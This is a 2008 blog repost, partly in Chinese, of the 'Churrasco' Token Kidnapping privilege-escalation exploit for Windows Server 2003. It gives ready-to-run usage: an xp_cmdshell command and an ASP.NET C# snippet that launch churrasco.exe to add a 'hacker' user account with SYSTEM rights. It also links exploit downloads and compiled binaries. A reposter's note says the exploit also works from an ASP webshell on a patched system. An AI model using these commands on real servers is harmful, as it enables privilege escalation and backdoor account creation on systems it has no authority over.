MS Windows 2003 Token Kidnapping Local Exploit PoC

    [阴 October 9, 2008 12:40 | by !4p47hy ]
It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows services accounts can impersonate.  Other process (not services) that can impersonate are IIS 6 worker processes so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recomend to not allow users to run this kind of code from ASP.

-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...

You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.

冷漠 PS: 我在虚拟机上测试成功 ,环境为 windows 2003_sp1 全补丁 ,在 .NET 也就是 User 权限下,能够成功执行系统命令,非常强大啊··截图如下:

更新 : 据朋友测试,在 asp 木马下 也可以成功提权,就是说 在guest 下 也可以执行系统命令,但是需要 .NET 的支持···

Highslide JS


Highslide JS


Highslide JS


Highslide JS


Code下载:

Download ( 705 downloads)

编译好的EXP:

Download ( 810 downloads)
Bug&Exp | Comments(1) | Trackbacks(0) | Reads(11502)
MK2
October 9, 2008 17:25
好东西.发一个编释好的程序吧....
!4p47hy replied on October 11, 2008 13:19
已经发上来了· ·
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive